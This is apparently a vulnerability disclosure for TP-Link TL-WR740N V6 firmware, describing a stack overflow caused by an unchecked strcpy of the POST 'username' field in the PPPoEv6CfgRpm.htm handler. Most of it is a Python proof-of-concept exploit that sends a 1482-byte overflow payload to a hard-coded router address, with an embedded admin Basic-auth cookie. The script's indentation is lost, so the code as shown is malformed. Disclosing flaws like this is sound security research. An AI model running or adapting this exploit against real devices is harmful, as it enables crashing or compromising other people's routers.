TL-WR740N V6
In the TL-WR740N V6 Firmware has a stack overflow vulnerability in the /userRpm/PPPoEv6CfgRpm.htm url. The v5 variable receives the username parameter from a POST request and is later assigned to the v38 variable, which is fixed at 101 bytes.
However, since the user can control the input of username, the statement strcpy(&v38[3], v5); can cause a buffer overflow. The user-provided username can exceed the capacity of the v38 array, triggering this security vulnerability.
import sys
import requests
session = requests.Session()
session.verify = False
def exp(path):
URI = "PPPoEv6CfgRpm.htm"
headers = {
"Host": "192.168.153.2",
"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:141.0) Gecko/20100101 Firefox/141.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Connection": "close",
"Referer": f"<http://192.168.153.2/{path}/userRpm/{URI}>",
"Cookie": "Authorization=Basic%20YWRtaW46MjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzM%3D",
"Upgrade-Insecure-Requests": "1",
"Priority": "u=4"
}
payload = "A" * 1482
params = {
#"ipv6Enable": "on",
#"pppoeSession": "1",
# "mtu": "0",
# "dnsType": "1",
"Save": "Save",
"username": payload,
# "ipAssignType": "0",
# "ipStart": "1000",
# "ipEnd": "2000",
# "time": "86400",
# "ipPrefixType": "0",
# "staticPrefix": "",
# "staticPrefixLength": "64",
}
url = f"<http://192.168.153.2:80/{path}/userRpm/{URI}>".format(
path=str(path)
)
resp = session.get(url, params=params, headers=headers)
print(resp.text)
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"python {sys.argv[0]} <path_string>")
sys.exit(1)
path_arg = sys.argv[1]
exp(path_arg)
